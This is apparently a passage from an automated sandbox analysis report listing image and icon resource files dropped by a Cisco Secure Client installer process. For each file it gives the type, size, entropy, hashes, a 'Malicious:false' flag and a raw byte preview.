                                                                                                                                      SHA-512:B0006DD98C201AD06F79166FD53F67C61C60C48C1506153EA47AB7F38A7D4F6CCACDF9E369AC0EFAD36B396786EDFD1FBEF8302D1F2B1F82BE6D784936ED6CB0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............5..6....pHYs...#...#.x.?v.. .IDATx..ml]......$..B.^..R.BI.mPB..i..B.I.D*.B...i...b7M...B...TI.CU..K..*.6%.\.5...T.....B.iU....U...x.d..y=g.9...dp..{.s.y^.y!e.1....z..BN...........[.~..X......Q.PO.w.!......k.d.M........x....y....<....O.oe.o."<...d..f.&2..".....(..{..}..C....]y..).xq.]...7....M....{......:'..'^.......9..0.._..~....#3.^M.t.0.....................\v].3.b.....ONz{.._..........m_..\..5W.buE...q..>...xE.+qA{E>^._.....f(...p5..s.fgI............_.z./.+V.>N.....D..). .q..9..!..9#..-(...^...G...].E.l.>..2...o..t/"C...x.\........u/ S|R..)-WMK..1..\..{..&..w..V.^...U8_A(l...Jp.....y.#..b{5:...F0-..N.c..ne..5....&.Kf(j7O....../0..N.[K.#Q|.K..cfjb;..N.....8.{....n#.j.O...Z._;.m.jWfp~.............. .w.}.<....\1X?+..4bi]..H)../.".....f.&N^......8..S..]...3..Cn..z]l.,........_...ek.e.F.-w?....i..i.B&./..........>.|r...Ii!....Q...t2._..HHCBx..B...<?35.J.....V/..s-...[..k..V.v.a.50..teS..w`fjbm....qC.....;89+!/@.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-N0NBO.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 1 x 38, 8-bit colormap, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2213
                                                                                                                                      Entropy (8bit):4.905752993252195
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:iY/6A64knA9WIiDYfv4c0POd9Od4LOR3POgHWv:iYSGknmWIiDYfQpOd9OdqOVOgHWv
                                                                                                                                      MD5:A3A99D7E09DE348A18379BA84F5FBD33
                                                                                                                                      SHA1:7E7BE73D74601EA7CCFE7389152D189DA10A275F
                                                                                                                                      SHA-256:A8F0C8E087C47D78EBC0D0D9FBE4BF124F9049BE49A4D7E919D80CEF3E294FD7
                                                                                                                                      SHA-512:414293559F4245B4065246C582D815582E4DFF1E0882CDC3B0439E66204916B9C372D5430C77C49444CB69F61C715337C67275773D76E36C377AB287FEAC2E8E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.......&.....2b.5....PLTE...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................h....pHYs................ iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 20

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-NB6Q2.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3881
                                                                                                                                      Entropy (8bit):6.749191813135782
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBQgI+P:iXHt+JcNgOSiS4XsAYNpf2ESNtgB
                                                                                                                                      MD5:C09256A999756AFFAE49A6E4346D910C
                                                                                                                                      SHA1:95158F9717019700B626D2A675F17C50853E436E
                                                                                                                                      SHA-256:D2913B404D604DD9F61952E0539DA5FCD742FC7E87F30CCC4263303DEC5F43B0
                                                                                                                                      SHA-512:D2DD40D4A8FBFEC4DFB2EF285880F103CB50D0AB461731915C15D8A4061E77C70513658419FF72925D90741FBD75079899E5293A107B7361B2142358534C94EA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............\9.....gAMA....|.Q.... cHRM...........R...@..}y.....<.....s<.w...9iCCPPhotoshop ICC profile..H..wTT....wz..0.R.....{.^Ea..`(..34.!...ED."HP..P$VD...T..$.(1.ET,oF.........o......Z..../...K......<....Qt.....`.).LVF._.{......!r._...zX..p..3.N....Y.|......9.,...8%K.......,f.%f.(A..9a..>.,....<...9..S.b...L!G....3..,....F.0.+.7..T.3...Il.pX."6.1...."....H._q.W,.d..rIK..s...t......A..d.p....&+..g.].R.......Y2...EE.4...4432..P.u.oJ..Ez...g.........`.j..-....-....b.8....o....M</..A...qVV....2.....O.....g$>...]9.La.....+-%M.g.3Y.......u..A.x....E.....K.......i<:...............Pc...u*@~..(.. ...]..o..0 ~y.*..s..7.g...%...9.%(....3........H.*...@...C`...-p.n.......V..H.....@....A1....jP..A3h..A'8..K....n..`.L.g`......a!2D..!.H... .d..A.P....B....By.f..*...z....:....@..]h...~....L.............C.Up.......p%....;...5.6<.?.........."....G..x...G.....iE..>.&2.. oQ...EG..lQ..P......U..F.Fu.zQ7Qc.Y.G4....G......t...].nB../.o.'.1.......xb"1I.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-NI1MT.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):417
                                                                                                                                      Entropy (8bit):7.261808950496785
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7ye/67M2KK09AtPNFPQM7vcvei4A62GCv+OQRWqxEz:de/YM2KYBTcKA62VWvE
                                                                                                                                      MD5:E49813F0A990FD98318710C0F0BFDA21
                                                                                                                                      SHA1:FD09D47A8BA649393221D5048D3BFF1FFADD3496
                                                                                                                                      SHA-256:79C957FB0133496B0266E8F5441982D3F1DAB781B90FBC34F59D75968577CD61
                                                                                                                                      SHA-512:8883387871CBE8B3778F5D95A95700D99B7D4737696051436C06060C645F83E25255A76AA73CD5BA1B03FC5797D8F6B99D1B0E489B5421D26D4E7DBFD358EA65
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR..............w=.....pHYs...........~....SIDATH..U.Q.0.}e.. ...............N@..3I.A.!.../.......r......SXTW.t..3.n..g.....!/k.t..{....=.^.+E.U..KD.@..@..)..sV...7u..[!_+..F.......#.......?$....3.t....;8.D...N.pv.H...Q\r.....T.t..t..F......~....1a3g......Y..L.#.F%..-.(.o...bl.}..=...T.d2.[.x".m..b.V*./........T...(..+.>[F5....7..j..2:....-;.....P.w|j..d.s.........&.cO........IEND.B`.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-O4E6H.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12068
                                                                                                                                      Entropy (8bit):7.961027992023309
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:ukEiqZZQXKSmwL4v9UIqsQ8Dfn0Mv2RYkTONqT0oHrkbthyZpLpXrCAfrdag8csp:uViqZZQXKSmwL4VXJhsYOTynyZpNmAjE
                                                                                                                                      MD5:7E7FE0627B08E07FEE4ED11C41A9BA59
                                                                                                                                      SHA1:E3C6036975AD146D70AE76158EEBD3D8109B0C7F
                                                                                                                                      SHA-256:019183BF0C9A25E37A7EB74ABB3DC7848C1A729BBDA1F557E26A5322DBAF11E2
                                                                                                                                      SHA-512:30E68B932388A840F92D45AA97C3B9CC012C28F36DE93D315B107C7223DCBFBF94A54A09492E930642555828FCB3F6CA519F75BE6EA451DFF7B1D2F5B8FA2472
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...-...-.....].6.....pHYs...#...#.x.?v.. .IDATx...l....q.a_...n`.p.l..].!.X.cmb.T{W/8.6..6......%".T..yO)"...e!..5....[.+.;..y....RX..s..@[.&.6..j...1..sf..93..I.....;.......(F...-5>P....(.`..T|..P...}.D.H....R.L..8.....1...$.....A.X?.sb..;@...h9.wJ.;._.)eM........Ss...........4..o.............P[j.E.~.TE..0.......ro../.PA..SjK..8A.Zs..eE..X.!...<Y..Z.rr\J.}w.....?e......`..X.c. %......p.z4M7.PC........&.6.......".1c..>...^.d..S.9../s..O... ..4.j.]S<.>u..v.d6..1..S.@.N.y..=...;...9v..=...wB..Y...%.D..$..b...6u....wM...#......w..-.g...F!...he.O..r.2.....Qj..{D.\.we}.....D. ...(...$Z...?.U......r3k.o.'R.M........s....W..h.Hm.q).U.Z...}w....;...'v..I...QO.....Q1k:.h%...Ws...UA....!7....w.f].G..X...w..^...VBT$..pQ.,`-Ms.0.H.C.......d .2....\."...."G.=...{:Xgw..Rj...&.(.e..-C..+.(.)......a...n...'.I..@...8b.'.v."..r.BF./.....`...1.$Z.T$.WE.Y5sWes.:......}:./.y.DK..R.j.B.....YQ..X d|a.^.......F.D+.|..(.....KZ....(.,8~...,".y.H=.! ....

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-OFV4A.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):478
                                                                                                                                      Entropy (8bit):7.3703130572324955
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7xE0NSVUvFAccOOfACD09VvVupRqR5/MXMmxHlWX:YY+vFr+cvV8w3MXMm+
                                                                                                                                      MD5:D3BD002D9E657FC264347FE2FE45EE8D
                                                                                                                                      SHA1:8EC6528F2E8A07036C5D5F439FA0438C99CE814E
                                                                                                                                      SHA-256:B17D8F8BC1B971962A798743630816DFEF50526A2692BB458A7B1B6A546D28B0
                                                                                                                                      SHA-512:3BF535A63BCE729ABD443CA4265147DB46DFF698BC2AA27C7FFE430527F7C4FD921AFFBD6E789BC00EAC4DFFE300E82488A8C4886DC9D629DCA6B5CF905C0624
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR..............w=.....pHYs...........~.....IDATH..U.m.@.}E. #d.n.. ..a....2@.6.p. a..AG...}..A.U..% ..g.g........u..%.w....'(.............%..{...S..p.gc.|...Y......|`I.\aZ..5..d@..>'.z.7.)....b...P.'...y..4.l...+........I!{......*w.eFV...d...H....xZT.c.F.=..*.f/.Q...".......BF7.a......)....|`..m.o..=.f.........%.d.._.........z!..&,6.;KwN@Z.<~1..%...b....L....<...k8.c.'.....+.&.dE...o..7.....ke..M..Ot..N..^..n.~............IEND.B`.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-OR0NC.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 8 bits/pixel, 32x32, 24 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5494
                                                                                                                                      Entropy (8bit):1.0422788649872297
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:xh4r3rEO9SEEEEEEEEE2888888888Bsff:xKfgH
                                                                                                                                      MD5:B4FE215E5858B187A041DEABB2E1CB04
                                                                                                                                      SHA1:E8F16887E8BFFF243EB1AEAAF21B382CD0DFD9EE
                                                                                                                                      SHA-256:9FC38B41A0D11FF64348F0E125692091D478E6E4F1C368A4E01863D49F87BB87
                                                                                                                                      SHA-512:371FEA20A067929B21543490CE56C370BE8477B40630D2EE0BA613FE91A485D083DCB0FE4B0E76465576935F0311CC65832B48B3487F5C2B83ABB4E8B9AB4270
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...... ..........&... ..............(... ...@...................................BBB.XXX.cbc.nmn.yxx...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-P5FCG.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):388
                                                                                                                                      Entropy (8bit):7.139959170245274
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7Hel//IgFAkq3Dhp5tRX3Sq+IeSzgKOg6p2e:aehvFXSELAgKja2e
                                                                                                                                      MD5:34C2847A763607A881B1E9A81CA9A4DC
                                                                                                                                      SHA1:B6050C2A1AA45C78F273B76FB729158E0F172D18
                                                                                                                                      SHA-256:4D735FCC94C53B0753F49E2656EE480D37F4899520F17C48FF7D1F0DDC2A9A8C
                                                                                                                                      SHA-512:8E3C4C1F62BDF79B2C5263D0C4DD97E302261A0C5C9399C13FADD3E25301F7DDA7297ECE3A8352534C9DA4B3A23FFE497FD61BDA348D14BB6658AF2C66863727
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR..............w=.....pHYs...........~....6IDATH...M.0.E.L....&hG..t...f.........F`.l..}n.....B..).....}.p.k....x..3n|oI.^..G._~%..3...7~.^...#D..]/.lD.....{...#..:...k..+n.U.....)".]'g...9Y...G.w^v.&.FX{....".i.k.:..bN.......b.(H......8.y. .E...s$.V.....U.sOwFo.#...a;:....2.....=.....P...ct.k.A..-....Q...<..R...$.FX.-M......k.W...b.}2o.....p.........IEND.B`.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-PG103.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12436
                                                                                                                                      Entropy (8bit):7.977312501768235
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:9duiLviw1Tg2WOFeuMhEhKPewOSJKVBpFGo5cJUs1P3X3cI78saDjy6Z7KiasZM1:7vJ0OYhbPWEKLaoe9dXsI789HZTla
                                                                                                                                      MD5:3F1083A6458C2CC3E9743D03ACB0D349
                                                                                                                                      SHA1:280DA65E961DAC251D6394A234E92FB110DBC998
                                                                                                                                      SHA-256:78A87D7B4CDA2E04CF4A608C78CE627450E15CD75AE121B4D72466837197D096
                                                                                                                                      SHA-512:250604CE42BD866B870A50B01E892036364DBBBEA1AC58EF60B3E4E38513A9DADE3987459FBD83681435D74521B368550DFE329E70CDD84837BAFCD2E43B53A2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.xV...c....../\..T..@.....T.`.d....H.H..^F.@...!.X.x.PqP..{4...4.F.I.......2....".?...f......._...?.u.....}$,$..._TZH.9H..q....5...[.[T.#=.=..._...s..R.0Or..5eCl...g..e7.+z?eE........6.~.";.y....W.(?...Wf:P..gI.<b.Lr..Qd..........\.A......t.`,._...u...`/.........!.{...T./...........+....>C......8.....[.. ...WNQ~.;v..3...b5.l...*\~....+R....+.. ........`..........{;v.|Ry..x..UQ.&..%..$....>s......../..2..\T..Y..G#......x....W\.DT[.....v},]I.Vr.m.....x.......1.cu.D...bO:...6...,[\)=....,o..o.a.(.".....&.D.......=x..*.P&.........".}z+/_..X`etu..J......1....A..;...B...{.....M./Vb....v.T.a..3.....k.....T..JC.u....`.[..(R..........{..4R...B.8...vE...}w5...[.....F...3pTU{k.Bz.L....-T...T..?......|Py0..&.J.|...........{"..3pT.V.r...PH..R..M5V..AB.8...R..A.\......(3.p;..\.h.m....p..Q..'ok...O.6.$.....g...J...0...?O.~[[.),,4..N.......M.....cb.jT.JU.e..........1..({DW....K.*,=..!..

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-PLOLQ.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 67 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1264
                                                                                                                                      Entropy (8bit):7.787798189239225
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GblEbksH883ZKHGbOgt1NxI7aY1nigCC2OjKe6Yt3CvPTWngq2i3sTj85:ElEJH8I/NkQgQ+KtY1C3Sngq2VW
                                                                                                                                      MD5:DB2D5090354734EC085D88810B342866
                                                                                                                                      SHA1:F727BC14361A4332C73BFB5194CA5FF6EAC37959
                                                                                                                                      SHA-256:996C1A034CC8B6CA3C511E2C7EE2FED22F31904DB769A1AD8555F1CFD478AA62
                                                                                                                                      SHA-512:04F9B9B5EABD33E318F6A83A734ECA67C2778745560F44F45C535847BF642B33DB2C6C974CC7A6AAE4C68C67470135B15ABB2A77247BFF3C518EC113FDFD8888
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...C...@.....A^......pHYs...#...#.x.?v....IDATx..\;R.A.m0.3...8.*C...o.@'.D.%N.:."..q..*o,...@........~.Z-.....J.*}fGo..t..h.jB.D]"b.#"zCD..+.D..,.,...X).q.......:.."...}#.Y:X.........!.1":...1w.`9.=p02.$bw..VP....C..M...F..`.\....w /2.$..5.bQ.^.C[.X.t.\.N..8....[XCQ...Q&.<~...'\C..s.j%.d@ ..8..y.0.9#....0-......q...]..1../....).t.<....L.V....@)N..HQ..+B....9W|d.K..^8..W2-!.}...... Z...e..jB.).9S..Uc.PsF...r...n.+.....:2n..".....!l....E.%'.I.......!$.."._....*....H...?.....HD......7F.u.+...Ke.+.S2`.C...M.........2F2.p.q...ZU\$..E.UX....p..4M..f.Pb...2..k..J..,.D....e.E....i..zc@...tX...s.t....>4"CM...47}....p...\..x#.(....96.yd...._.@.6...C7..2.P....QD...3...7z..d`...3..]...+.b.`k..5....I.#K.V.%.F.h6`. f...g.....G..l....~"l..17.{. m.......1S..$z@.....4....5.........ks.E....._....52L.T.....m..`..;.r....&..p-...}.s.l.S....d%.q..[2...a.. ..|..4.1...v.....j.|b..d0\.....{..6.E.*22.S"..JHa.U.\f.. c.m..!t.HH.MS.sU.P&.Y.!_2.^..V..(S..=

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-PNDSK.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:Targa image data - Map 32 x 2841 x 1 +1
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):431993
                                                                                                                                      Entropy (8bit):4.565786626694248
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:qG481XVja/lkbbVYHd6saT3N2z00cAXoKM0Baf0I:qC3a/lkbbaHd6saT3QZnXdBZI
                                                                                                                                      MD5:A6441E0D126BDAEB1308C9B4EB5D30D7
                                                                                                                                      SHA1:07206E99763B97507D5D7BCB3DF221F48ABF60FF
                                                                                                                                      SHA-256:5A624CBE0242B49FE13104345760BD16F6B2D50F1AC9FB19B92F76BDBBED938A
                                                                                                                                      SHA-512:DC85660518234A581F3EA19FB5892F53B1BA3671293F5BB886AD63D91CCEA0AC31E55ECEA528487AF1BC343CF226E268CF50B4903D67430919FD9B715889EB7B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:............ ............... ............... .^N............ .(R............ .(...!S..``.... .....I[..@@.... .(B......00.... ..%...2..((.... .h....W.. .... .....)r........ .............. .....Y......... .h........PNG........IHDR.....................pHYs..........o.d.. .IDATx...wtUU....MO..B....TA.. ...l....Ti"H.E...D@lT.EA.).... ........R...{o...Jd..o.L...},.RJ9.1.......#W..` (.#.._.....?>|..ki@j.G..........q..........2>....( ......RJ)u.,..J).2..a@^ <....C..?;..}9..f..p....|..#,.J...Rn.]..(.T.3.x....@..|.D..vu.N....W.|D.....y..(..5.c, ..^..!}.....Np...eY)B.R...PJy<cL(P9."._.............^...W....RJ)G..@).1.1.@9...U2>*..UGy.(2......,..M..R6..@).1..r._....dH.S.WC.Ws.eYi...R*+h...ri..?.j.........[..vsyc.eY...R..i...r).....wd|.B..+.....M.F`.eY.e#)....@).h.R..._..=...K9.q....>v..".....Q..cdl.....w.~Q.R.$.......t.R.I..PJ...<.C.}..&....M...h..(.l.1.....J..!...2>.Y.uA8.R...^.T.2...........H).I...V..,..!.G)...PJe..}....S.....r9'.....e....r3..(.n.1.8......M

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-QSCG6.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):29723
                                                                                                                                      Entropy (8bit):7.971507308971378
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:f/oVoAjsba3qfpgr/jKyV8xonTTdZPNE/ZIeb4p82Xg:fwZ6tyHTTdERbkp8Mg
                                                                                                                                      MD5:DDF9FC987801BDE753D2C37733DE7F3D
                                                                                                                                      SHA1:BDA65E600F5EDD2889244E2C1CEAD37C1C292FC8
                                                                                                                                      SHA-256:D62A61171CAAD9B43DBCE2683DB87959B2C1FCB303D6B34A3DC1D178A9745F44
                                                                                                                                      SHA-512:D1C0451C3E9B52920A56EDF57CCF3617662E18B14E0E0B00A94D948574431C30E1C31BA2FF6F4BBFA8E01D42B00EA90FD03CD1D3991B3ACF04C5C9802F547244
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx.._h].....Er..uQh..T2...E#.0m.....d...i/2.%2..L....N....L;.....%>..g.-.!...ER!&.j9..y..2.u.....x ..w.Y;.^{......~@..K{....~......,.!6....._.>(../........../~....FO.!....d.a.9thp..^.'t=...4>d.%....x.=....Z;.e.....=.^...6'....;88....o..k?....{.....ir2j..&'..:'fqqQ\.x...{2*..~./^..z.....5q..J.....!.~..q..N..0..+....z2...'!K..rH.&ET..^......4vY.;[.......b.q+d.].te,//.s".<.{.....\.+.le.^......+$.u....PO..v|./.he....O.J.......=H.....7cy..q......Y.k]......N......g#.I....M..?.........."{.dO...^.k..U....NH.qg....X..#.5|..E....7r..}.NF..4..J...w~.._....E.".Qu.:.E...{..l...U(..D..P...d..K.z.h..%/^.w\;.N..d...|.Q...X....2=.......W.......eR.X..~....;.Uo.w.....3....#.....7'.....q......f...D$$'ck..'P.G.y..v..!......A..T....*..w...F.U...OF].............V....*..biU$4>.U..y..OvB%=.S....B..b.DLM....WyQl..:c.a.D..o.6.\&kkk^.....Pm....=....kZ...~.*.u2.Qjr....lL..q...km.b|......>...E

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-R9E2F.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3880
                                                                                                                                      Entropy (8bit):6.742220289284142
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBcr:iXHt+JcNgOSiS4XsAYNpf2ESNVr
                                                                                                                                      MD5:3C512CF63246231506E533D6800FF3EB
                                                                                                                                      SHA1:CF02F3D7AD80DC48B900464D1F8D828F44213443
                                                                                                                                      SHA-256:C211B550E4DF39BDD1E7A39E7979EBFEAB155BDAEF2498A09D63B45713C30768
                                                                                                                                      SHA-512:ECE459102971594D5EB348FF9AA16E5EC0E7222594D63096289B566B07D020B534947D231E6C3CA1E139F407B9A5251933CF38C7BCEDAE693741499A9108D9D6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............\9.....gAMA....|.Q.... cHRM...........R...@..}y.....<.....s<.w...9iCCPPhotoshop ICC profile..H..wTT....wz..0.R.....{.^Ea..`(..34.!...ED."HP..P$VD...T..$.(1.ET,oF.........o......Z..../...K......<....Qt.....`.).LVF._.{......!r._...zX..p..3.N....Y.|......9.,...8%K.......,f.%f.(A..9a..>.,....<...9..S.b...L!G....3..,....F.0.+.7..T.3...Il.pX."6.1...."....H._q.W,.d..rIK..s...t......A..d.p....&+..g.].R.......Y2...EE.4...4432..P.u.oJ..Ez...g.........`.j..-....-....b.8....o....M</..A...qVV....2.....O.....g$>...]9.La.....+-%M.g.3Y.......u..A.x....E.....K.......i<:...............Pc...u*@~..(.. ...]..o..0 ~y.*..s..7.g...%...9.%(....3........H.*...@...C`...-p.n.......V..H.....@....A1....jP..A3h..A'8..K....n..`.L.g`......a!2D..!.H... .d..A.P....B....By.f..*...z....:....@..]h...~....L.............C.Up.......p%....;...5.6<.?.........."....G..x...G.....iE..>.&2.. oQ...EG..lQ..P......U..F.Fu.zQ7Qc.Y.G4....G......t...].nB../.o.'.1.......xb"1I.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-ROULC.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 5334 x 1067, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):83111
                                                                                                                                      Entropy (8bit):7.138058183615623
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:VC5Kuc25xWuSyREGUa7eZoQZBrMd+Wdl6P1NsDO1U:VC5Dx8yRTeBZW4k9DOu
                                                                                                                                      MD5:E9352AD002DC71C84B605700A6684C46
                                                                                                                                      SHA1:312487A0D0778CB57EBC0B5ABBA29CB6C31187FA
                                                                                                                                      SHA-256:55E9F9561425D5B5994506DB5932FF3C87ACAD729BB4CC043EE99EFB85484E0A
                                                                                                                                      SHA-512:CAC779DCB625BF8C8736686407BB81DB140434FB16DC98144E113F2822AB3A907A7E7CA63751D73604B11EF0F0DFCB6979833DE75B160542CF7C969F39533867
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.......+........%....pHYs...#...#.x.?v.. .IDATx...kn...`..^..#?N...$..d)..c.5d/..ASy.q$Y....y...3.D........................................................................................E.....GW.....P..Z.nC........0\./_Ow?v:...`..x.j=..9.......@....5q....P5.&...hl.....&...hl.....&...hl.....&...hl...M..\v.......P.{.g.h}.;2.@...e#........Xr8.n.....s.er..<.4...fNi......H3.r:.....?u$`'.~.~...dsHN.<.s}.0.qy...x.A<..}7L.y....}^~...].w([U.M`.5..1... .pB.F.>IMc..|..y.].......7...^46.a.....p.c..-...{.`.....,..#x...>I.:......a.........|M.-..k..7:...;...C.........?>~>..)........o9(O.i.'.{.n..~.q....2Q.....W&.....R....Il.....;..~kH|_.R......O....2..}jp....f.1!%..OY....n...F.lfL....W....'.CH,.....g/..y>>~.+*j...$e........Mb..;.........Z...A.:.~...Y|.o1P.A.$...)....~....S;.RR..@...W.&.}.q=.N...:[.C1.5.=...r.U&+._.z.O~o........m......}..t.vcR....u..{...&P..7.......c<....15.?u..5..U.c..........:.*.N.MhPw.=..K..y..>vc.....{;....F>..k......,.-..N...

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-T2IN7.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12780
                                                                                                                                      Entropy (8bit):7.975972884511595
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:eS01CYt7F9/5i2XPFK02VBVDNP/RqOMGkw9j:e1th95PqjP/E1A
                                                                                                                                      MD5:1CE2626120CD6B69683255C71552896B
                                                                                                                                      SHA1:4230DF12A00E6B13CAB39EFB1C44DCBF5B656087
                                                                                                                                      SHA-256:B55ABBF6754B131C33947DCA3511D219B2AB2DC5D7E8945BF3C6A2E9FB0FEB23
                                                                                                                                      SHA-512:A197A76FB7DB9FEF68E3A49DE4C134EFB41472773F323BF4F8AB3B610174FD75C15848BB42CFC2D4240D72EFA66FF4CFFE02DDA28323279C87C7019E167F724B
                                                                                                                                      Malicious:false
